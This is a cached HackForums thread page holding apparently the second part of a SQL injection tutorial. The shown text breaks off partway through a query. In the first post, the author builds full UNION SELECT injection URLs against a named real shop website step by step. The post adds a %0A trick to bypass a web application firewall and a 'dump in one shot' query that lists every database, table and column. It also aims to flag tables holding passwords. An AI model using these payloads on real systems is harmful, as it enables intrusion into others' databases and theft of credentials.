<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><script src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/bmi.js" language="javascript"></script><!-- base href="http://www.hackforums.net/showthread.php?tid=3532481" --></head><body><div style="background:#fff;border:1px solid #999;margin:-1px -1px 0;padding:0;"><div style="background:#ddd;border:1px solid #999;color:#000;font:13px arial,sans-serif;font-weight:normal;margin:12px;padding:8px;text-align:left">This is Google's cache of <a href="http://www.hackforums.net/showthread.php?tid=3532481" style="text-decoration:underline;color:#00c">http://www.hackforums.net/showthread.php?tid=3532481</a>. It is a snapshot of the page as it appeared on 23 Feb 2014 04:17:11 GMT. The <a href="http://www.hackforums.net/showthread.php?tid=3532481" style="text-decoration:underline;color:#00c">current page</a> could have changed in the meantime. <a href="http://support.google.com/websearch/bin/answer.py?hl=en&amp;p=cached&amp;answer=1687222" style="text-decoration:underline;color:#00c">Learn more</a><br>Tip: To quickly find your search term on this page, press <b>Ctrl+F</b> or <b>⌘-F</b> (Mac) and use the find bar.<br><br><div style="float:right"><a href="http://webcache.googleusercontent.com/search?q=cache:GUEKu4SWf1gJ:www.hackforums.net/showthread.php%3Ftid%3D3532481&amp;hl=en&amp;gl=in&amp;strip=1" style="text-decoration:underline;color:#00c">Text-only version</a></div><div>&nbsp;</div></div></div><div style="position:relative"><title>[SQLi Tutorial] playing with "dump in one shot" syntax - part #2 - Page 1</title> <meta name="description" content="SQL Injection Attacks-[SQLi Tutorial] playing with &quot;dump in one shot&quot; syntax - part #2"><link rel="canonical" href="http://www.hackforums.net/showthread.php?tid=3532481"><meta http-equiv="X-UA-Compatible" content="IE=8"><link rel="alternate" type="application/rss+xml" title="Latest Threads (RSS 2.0)" href="http://www.hackforums.net/syndication.php"><link rel="alternate" type="application/atom+xml" title="Latest Threads (Atom 1.0)" href="http://www.hackforums.net/syndication.php?type=atom1.0"><link rel="image_src" href="http://x.hackforums.net/images/avatars/Hardstyle2.png"><link rel="apple-touch-icon" href="http://x.hackforums.net/apple-touch-icon-precomposed.png"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="Content-Script-Type" content="text/javascript"><script type="text/javascript" src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/prototype.js"></script> <script type="text/javascript" src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/general.js"></script> <script type="text/javascript" src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/popup_menu.js"></script> <link type="text/css" rel="stylesheet" href="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/global.css"><link type="text/css" rel="stylesheet" href="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/star_ratings.css"><link type="text/css" rel="stylesheet" href="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/showthread.css"><script type="text/javascript"><!--
	var cookieDomain = ".hackforums.net";
	var cookiePath = "/";
	var cookiePrefix = "";
	var deleteevent_confirm = "Are you sure you want to delete this event?";
	var removeattach_confirm = "Are you sure you want to remove the selected attachment from this post?";
	var loading_text = 'Loading. <br />Please Wait..';
	var saving_changes = 'Saving changes..';
	var use_xmlhttprequest = "1";
	var my_post_key = "f54c7ca2b9f607627cb9306cf37f1b0f";
	var imagepath = "http://x.hackforums.net/images/modern_bl";
// -->
</script> <script type="text/javascript" src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/tabcontent.js">/***********************************************
* Tab Content script v2.2- copyright Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Drive at http://www.dynamicdrive.com/ for full source code
***********************************************/
</script> <!--//--><script type="text/javascript"><!--
	var quickdelete_confirm = "Are you sure you want to delete this post?";
// -->
</script> <script type="text/javascript" src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/thread.js"></script> <!--//--><div id="container"><div class="largetext">Welcome to HackForums.net<span class="smalltext float_right"><strong>Current time:</strong> 02-22-2014, 09:17 PM</span></div><a name="top" id="top"></a><div id="header"><div class="logo"><a href="http://www.hackforums.net/"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/logo_bl.gif" alt="" title="Hack Forums ... Shift+R improves the quality of this image. Shift+A improves the quality of all images on this page."></a></div><div class="menu"><ul><li><a href="http://www.hackforums.net/" class="navButton">Home</a></li> <li><a href="http://www.hackforums.net/upgrade.php" class="navButton">Upgrade</a></li> <li><a href="http://www.hackforums.net/search.php" class="navButton">Search</a></li> <li><a href="http://www.hackforums.net/memberlist.php" class="navButton">Members</a></li> <li><a href="http://www.hackforums.net/extras.php" class="navButton">Extras</a></li> <li><a href="http://www.hackforums.net/misc.php?action=help" class="navButton">Help</a></li> <li><a href="http://twitter.com/hackforumsnet" class="navButton">Follow</a></li> <li><a href="http://www.hackforums.net/contact.php" class="navButton">Contact</a></li></ul></div><hr class="hidden"><div id="panel"><span id="quick_login">Hello There, Guest! (<a href="http://www.hackforums.net/member.php?action=login">Login</a> — <a href="http://www.hackforums.net/member.php?action=register">Register</a>)</span></div></div><!--//
 <br />

<div class="pm_alert"> &nbsp;</div>
--><hr class="hidden"><br class="clear"><div id="content"><div class="navigation"><a href="http://www.hackforums.net/index.php">Hack Forums</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=45">Hacks, Exploits, and Various Discussions</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=43">Website and Forum Hacking</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=103">SQL Injection Attacks</a> / <span class="active">[SQLi Tutorial] playing with "dump in one shot" syntax - part #2</span></div><br><div class="quick_keys"><div class="float_left"><div class="pagination"><span class="pages">Pages (2):</span> <span class="pagination_current">1</span> <a href="http://www.hackforums.net/showthread.php?tid=3532481&amp;page=2" class="pagination_page">2</a> <a href="http://www.hackforums.net/showthread.php?tid=3532481&amp;page=2" class="pagination_next">Next »</a></div></div><div class="float_right" style="padding: 5px 2px;"><a href="http://www.hackforums.net/newreply.php?tid=3532481" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><div style="margin-top: 6px; padding-right: 10px;" class="float_right"><script type="text/javascript" src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/rating.js"></script><div id="success_rating_3532481" style="float: left; padding-top: 2px; padding-right: 10px;">&nbsp;</div><strong style="float: left; padding-right: 10px;">Thread Rating:</strong><div class="inline_rating"><ul class="star_rating star_rating_notrated" id="rating_thread_3532481"><li style="width: 0%" class="current_rating" id="current_rating_3532481">0 Votes - 0 Average</li> <li><a class="one_star" title="1 star out of 5" href="http://www.hackforums.net/ratethread.php?tid=3532481&amp;rating=1&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">1</a></li> <li><a class="two_stars" title="2 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3532481&amp;rating=2&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">2</a></li> <li><a class="three_stars" title="3 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3532481&amp;rating=3&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">3</a></li> <li><a class="four_stars" title="4 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3532481&amp;rating=4&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">4</a></li> <li><a class="five_stars" title="5 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3532481&amp;rating=5&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">5</a></li></ul></div></div><!--//--><table class="tborder" style="clear: both; border-bottom-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="thead" colspan="2"><div class="float_right"><a href="#top" id="thread_options_3532481" class="smalltext"><strong>Thread Options</strong></a><div id="thread_options_3532481_popup" class="popup_menu" style="display: none;"><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/printthread.php?tid=3532481" class="popup_item">View a Printable Version</a></div><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=3532481&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" class="popup_item" rel="nofollow">Subscribe to this thread</a></div></div></div><script type="text/javascript"><!--
    new PopupMenu("thread_options_3532481");
// -->
</script><div><strong>[SQLi Tutorial] playing with "dump in one shot" syntax - part #2</strong></div></td></tr></tbody></table><div id="posts"><!--//--><a name="pid33122849" id="pid33122849"></a><table class="tborder" style="border-top-width: 0; " id="post_33122849" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">06-06-2013, 04:46 PM <span id="edited_by_33122849"><span class="smalltext">(This post was last modified: 10-12-2013 09:30 AM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543">ajkaro</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3532481&amp;pid=33122849#pid33122849">#1</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 133<br>Posts: 2,156<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">194</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_33122849">In <a href="http://www.hackforums.net/showthread.php?tid=3487536" target="_blank"><span style="text-decoration: underline;">first part</span></a> we learned how to compose complex command and how to use syntax "dump in one shot" to overcome <span style="color: #00BFFF;">group_concat</span> limit of 1024 characters.<br><br>This is second part of tutorial. In this tutorial you will find explanation how to solve my challenge <span style="font-size: large;"><span style="font-weight: bold;"><span style="color: #32CD32;">#46</span></span></span> <a href="http://www.hackforums.net/showthread.php?tid=3480082" target="_blank">http://www.hackforums.net/showthread.php?tid=3480082</a> <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"><br><br>In <a href="http://www.hackforums.net/showthread.php?tid=3567217" target="_blank"><span style="text-decoration: underline;">next part #3</span></a> I will explain how to add number of table records to our command (see <a href="http://www.hackforums.net/showthread.php?tid=3525425" target="_blank">challenge #49</a>)<br><br>If
 you follow my challenges (#45, #46, #49, (#50-not published yet)) you 
can guess where are we going. We are building complex SQLi command which
 will give us <span style="color: #FFD700;">total statistics</span>:<br><br>- number of databases<br>- list all databases<br>- number of tables in each database<br>- list all tables in each database<br>- number of columns in each table<br>- list all columns in each table<br>- number of records in each table<br>- mark all tables where column name include letters <span style="color: #32CD32;">pass </span>(searching for passwords)<br><br>Such
 command we will simply copy to vulnerable place and result will be 
everything we want to know at every SQL injection. All that with one 
command <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/pirate.gif" style="vertical-align: middle;" alt="Pirate" title="Pirate" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"><br><br>This tutorial is related to challenge <span style="font-weight: bold;">#46</span> where task was:<br><span style="font-weight: bold;"><span style="color: #FFD700;">A</span></span> - display version with your name<br><span style="font-weight: bold;"><span style="color: #32CD32;">B</span></span> - display total number of databases<br><span style="font-weight: bold;"><span style="color: #00BFFF;">C</span></span> - display total number of tables (without those in information_schema)<br><span style="font-weight: bold;"><span style="color: #FF1493;">D</span></span> - display all table names (excluding those from information_schema) and columns count for each table<br><br>Based on that we already know we will have to concatenate four parts (<span style="color: #FFD700;">A</span>, <span style="color: #32CD32;">B</span>, <span style="color: #00BFFF;">C</span> and <span style="color: #FF1493;">D</span>) using function <span style="color: #FFD700;">concat()</span> so our command which will be injected at vulnerable column will be something like<br><br>concat(<span style="color: #FFD700;">A</span>, <span style="color: #32CD32;">B</span>, <span style="color: #00BFFF;">C</span>, <span style="color: #FF1493;">D</span>)<br><br>For easier reading we will build our command step by step (see explanation for parts <span style="font-weight: bold;"><span style="color: #FFD700;">A</span></span>, <span style="font-weight: bold;"><span style="color: #32CD32;">B</span></span>, <span style="font-weight: bold;"><span style="color: #00BFFF;">C</span></span> and <span style="color: #FF1493;"><span style="font-weight: bold;">D</span></span> bellow). Because our syntax will be quite long and maybe complex for someone I will write it like:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>concat<br>&nbsp;&nbsp;(<br>&nbsp;&nbsp;&nbsp;&nbsp;A,<br>&nbsp;&nbsp;&nbsp;&nbsp;B,<br>&nbsp;&nbsp;&nbsp;&nbsp;C,<br>&nbsp;&nbsp;&nbsp;&nbsp;D<br>&nbsp;&nbsp;)</code></div></div><br>We will step by step replace <span style="font-weight: bold;"><span style="color: #FFD700;">A</span></span>, <span style="font-weight: bold;"><span style="color: #32CD32;">B</span></span>, <span style="font-weight: bold;"><span style="color: #00BFFF;">C</span></span> and <span style="color: #FF1493;"><span style="font-weight: bold;">D</span></span> parts with our commands.<br><br>Finding columns count (46) is easy. Nothing special there...<br><br><span style="font-size: large;"><span style="font-weight: bold;"><span style="color: #FFD700;">part A</span></span></span><br><br>Let's try <span style="color: #FFD700;">union select </span>command with our 46 columns:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.sonoshop.fr/pages/produit.php?id=55
 and 0 UNION SELECT 
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
​,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46-- - -</code></div></div><br>and we get many vulnerable columns on screen. So far no WAF <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/yeye.gif" style="vertical-align: middle;" alt="Yeye" title="Yeye" border="0"><br><br>So concat for part <span style="font-size: medium;"><span style="font-weight: bold;"><span style="color: #FFD700;">A</span></span></span> will look like:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>concat<br>&nbsp;&nbsp;(<br>&nbsp;&nbsp;&nbsp;&nbsp;&lt;BR&gt;, version(), :: ajkaro (or your name),<br>&nbsp;&nbsp;&nbsp;&nbsp;B,<br>&nbsp;&nbsp;&nbsp;&nbsp;C,<br>&nbsp;&nbsp;&nbsp;&nbsp;D&nbsp;&nbsp;<br>&nbsp;&nbsp;)</code></div></div><br>All parts except version() should be converted to hex so working command will be:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.sonoshop.fr/pages/produit.php?id=55
 and 0 UNION SELECT 
1,2,3,4,5,6,7,8,9,concat(0x3c62723e,version(),0x203a3a20616a6b61726f),11,12,13,1
​
4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,
​41,42,43,44,45,46-- -</code></div></div>and we can nicely see version with our name on web page.<br><br><span style="font-size: large;"><span style="font-weight: bold;"><span style="color: #32CD32;">part B</span></span></span><br><br>In part <span style="font-weight: bold;"><span style="color: #32CD32;">B</span></span> we need total number of databases.<br><br>Let's start part <span style="font-weight: bold;"><span style="color: #32CD32;">B </span></span>with
 &lt;BR&gt; for new line following by some label text and command 
count(*). After those modification our previous concat command is now:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>concat<br>&nbsp;&nbsp;(<br>&nbsp;&nbsp;&nbsp;&nbsp;&lt;BR&gt;, version(), :: ajkaro (or your name),<br>&nbsp;&nbsp;&nbsp;&nbsp;&lt;BR&gt;, total number of databases: , (select count(*) from information_schema.schemata),<br>&nbsp;&nbsp;&nbsp;&nbsp;C,<br>&nbsp;&nbsp;&nbsp;&nbsp;D<br>&nbsp;&nbsp;)</code></div></div><br>We will find total number of database with <span style="color: #FFD700;">(select count(*) from information_schema.schemata)</span>:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.sonoshop.fr/pages/produit.php?id=55
 and 0 UNION SELECT 
1,2,3,4,5,6,7,8,9,concat(0x3c62723e,version(),0x203a3a20616a6b61726f,<br>0x3c62723e746f74616c206e756d626572206f66206461746162617365733a20,(select
 count(*) from 
information_schema.schemata)),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
​,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46-- -</code></div></div><br>What we get? Error. <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/blink.gif" style="vertical-align: middle;" alt="Blink" title="Blink" border="0"><br><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/5e5b78b91d2d553a2c23ba9ebf3316f4.jpg" alt="[Image: 5e5b78b91d2d553a2c23ba9ebf3316f4.jpg]" border="0"><br><br>We didn't see any WAF so far using commands <span style="color: #FFD700;">union select</span>.
 They are WAF protected quite often. But obviously there is some WAF 
because our command doesn't work. Which command could be WAF protected 
in our last command. <span style="color: #FFD700;">Select </span>isn't because we already used it in previous command showing version with our name. I didn't have situation where command <span style="color: #FFD700;">count()</span> was WAF protected so let's try different antiWAF syntax for command <span style="color: #32CD32;">from</span>. Adding <span style="color: #00BFFF;">%0A</span> before command <span style="color: #FFD700;">from </span>bypass WAF so our command will be:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.sonoshop.fr/pages/produit.php?id=55
 and 0 UNION SELECT 
1,2,3,4,5,6,7,8,9,concat(0x3c62723e,version(),0x203a3a20616a6b61726f,<br>0x3c62723e746f74616c206e756d626572206f66206461746162617365733a20,(select count(*) %0Afrom information_schema.schemata))<br>,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3​7,38,39,40,41,42,43,44,45,46-- -</code></div></div><br>and we get result:<br><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/d7f2e0001d9682343496edc07ec88fba.jpg" alt="[Image: d7f2e0001d9682343496edc07ec88fba.jpg]" border="0"><br><br>Let us remember <span style="color: #00BFFF;">%0Afrom</span> because we will need it again.<br><br><span style="font-size: large;"><span style="font-weight: bold;"><span style="color: #00BFFF;">part C</span></span></span><br><br>In part <span style="font-weight: bold;"><span style="color: #00BFFF;">C</span></span> we have to display total number of tables (without those in information_schema).<br><br>Our concat command we are building up step to step will be:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>concat<br>&nbsp;&nbsp;(<br>&nbsp;&nbsp;&nbsp;&nbsp;&lt;BR&gt;, version(), :: ajkaro (or your name),<br>&nbsp;&nbsp;&nbsp;&nbsp;&lt;BR&gt;, total number of databases: , (select count(*) %0Afrom information_schema.schemata),<br>&nbsp;&nbsp;&nbsp;&nbsp;&lt;BR&gt;,
 total number of tables in databases (without information_schema): , 
(select count(*) %0Afrom information_schema.tables where 
table_schema!=information_schema),<br>&nbsp;&nbsp;&nbsp;&nbsp;D<br>&nbsp;&nbsp;)</code></div></div><br>We will find total number of tables in databases (without information_schema) with <span style="color: #FFD700;">(select count(*) %0Afrom information_schema.tables where table_schema!=information-schema)</span> and our code after converting some parts to hex will be:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.sonoshop.fr/pages/produit.php?id=55
 and 0 UNION SELECT 
1,2,3,4,5,6,7,8,9,concat(0x3c62723e,version(),0x203a3a20616a6b61726f,<br>0x3c62723e746f74616c206e756d626572206f66206461746162617365733a20,(select count(*) %0Afrom information_schema.schemata),<br>0x3c62723e746f74616c206e756d626572206f66207461626c657320696e20646174616261736573
​2028776974686f757420696e666f726d6174696f6e5f736368656d61293a20,(select 
count(*) %0afrom information_schema.tables where 
table_schema!=0x696e666f726d6174696f6e5f736368656d61)),11,12,13,14,15,16,17,18,1
​
9,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,
​46-- -</code></div></div><br>and we get:<br><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/db54f86bfa824e17489fdbb6ea758314.jpg" alt="[Image: db54f86bfa824e17489fdbb6ea758314.jpg]" border="0"><br><br><span style="font-size: large;"><span style="font-weight: bold;"><span style="color: #FF1493;">part D</span></span></span><br><br>In part <span style="color: #FF1493;"><span style="font-weight: bold;">D</span></span> we must display a list with all table names (excluding those from information_schema) and columns count for each table.<br><br>As we all know <span style="color: #FFD700;">group_concat</span> has default limit of <span style="color: #32CD32;">1024 characters</span> so many times we can't see all data from some table. Best way to overcome that is syntax:<br><br><span style="font-size: large;"><span style="font-weight: bold;"><span style="color: #FFA500;">Dump in one shot </span></span></span><br><br>If we want for example dump all table schema names and table names with their column names we will use this syntax:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>(select
 (@x) from (select (@x:=0x00), (select (0) from 
(information_schema.columns) where (table_schema!='information_schema') 
and (0x00) in 
(@x:=concat(@x,'&lt;br&gt;',table_schema,'--&gt;',table_name,'--&gt;',column_name))))x)</code></div></div><br>Our concat command we are building up step to step will be:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>concat<br>&nbsp;&nbsp;(<br>&nbsp;&nbsp;&nbsp;&nbsp;&lt;BR&gt;, version(), :: ajkaro (or your name),<br>&nbsp;&nbsp;&nbsp;&nbsp;&lt;BR&gt;, total number of databases: , (select count(*) %0Afrom information_schema.schemata),<br>&nbsp;&nbsp;&nbsp;&nbsp;&lt;BR&gt;,
 total number of tables in databases (without information_schema): , 
(select count(*) %0Afrom information_schema.tables where 
table_schema!=information-schema),<br>&nbsp;&nbsp;&nbsp;&nbsp;&lt;BR&gt;, table: , dump_in_one_shot_syntax<br>&nbsp;&nbsp;)</code></div></div><br>This time we are interested only in table names and columns count in each table. We will modify initial command <span style="color: #32CD32;">dump in one shot</span> to:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>(select
 (@x) from (select (@x:=0x00), (select (0) from 
(information_schema.tables) where (table_schema!='information_schema') 
and (0x00) in (@x:=concat(@x,'&lt;br&gt;',table_name))))x)</code></div></div><br>Such command will give us all table names:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.sonoshop.fr/pages/produit.php?id=55
 and 0 UNION SELECT 
1,2,3,4,5,6,7,8,9,concat(0x3c62723e,version(),0x203a3a20616a6b61726f,<br>0x3c62723e746f74616c206e756d626572206f66206461746162617365733a20,(select count(*) %0Afrom information_schema.schemata),<br>0x3c62723e746f74616c206e756d626572206f66207461626c657320696e20646174616261736573
​2028776974686f757420696e666f726d6174696f6e5f736368656d61293a20,(select 
count(*) %0afrom information_schema.tables where 
table_schema!=0x696e666f726d6174696f6e5f736368656d61),(select(@x)%0afrom(select(
​
@x:=0x00),(select(0)%0afrom(information_schema.tables)where(table_schema!=0x696e
​
666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,0x7461626c
​
653a20,table_name))))x)),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2
​9,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46-- -</code></div></div><br>And really we get all tables we want:<br><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/ba0ba2cbe6d8fd7771944c6b9ac816fc.jpg" alt="[Image: ba0ba2cbe6d8fd7771944c6b9ac816fc.jpg]" border="0"><br><br>The only thing still missing in our command is counting columns in each tables. We will use this command for that:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>(select count(*) from information_schema.columns where table_name=xxx)</code></div></div><br><span style="color: #FF0000;">Here comes the problem.</span> <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/confused.gif" style="vertical-align: middle;" alt="Confused" title="Confused" border="0"> How to input proper table name instead of xxx for each new table?<br><br>We will use local variable for that. Our previous part (<span style="color: #FFD700;">dump in one shot</span>) will be modified with adding following statement <span style="color: #32CD32;">@tbl=table_name</span> like:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>(select(@x)%0afrom(select(@x:=0x00),(select(0)%0afrom(information_schema.tables)
​
where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=conca
​t(@x,0x3c62723e,0x7461626c653a20,@tbl:=table_name))))x)</code></div></div><br>Now we have local variable <span style="font-weight: bold;"><span style="color: #00BFFF;">tbl</span></span> where table name is stored each time for every new table. Our modified command to get columns count for each table will be:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>(select count(*) from information_schema.columns where table_name=@tbl)</code></div></div><br>Let's insert that code right after <span style="color: #FFD700;">table_name</span>
 in our command above. Don't forget to add comma before as we are adding
 new part to concat() function. Right after table_name we will add some 
text first like: <span style="color: #32CD32;">--&gt; columns: </span>After changing it in hex whole syntax <span style="color: #00BFFF;">dump in one shot</span> part will be:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>(select(@x)%0afrom(select(@x:=0x00),(select(0)%0afrom(information_schema.tables)
​
where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=conca
​t(@x,0x3c62723e,0x7461626c653a20,@tbl:=table_name, 
0x202d2d3e20636f6c756d6e733a20, 
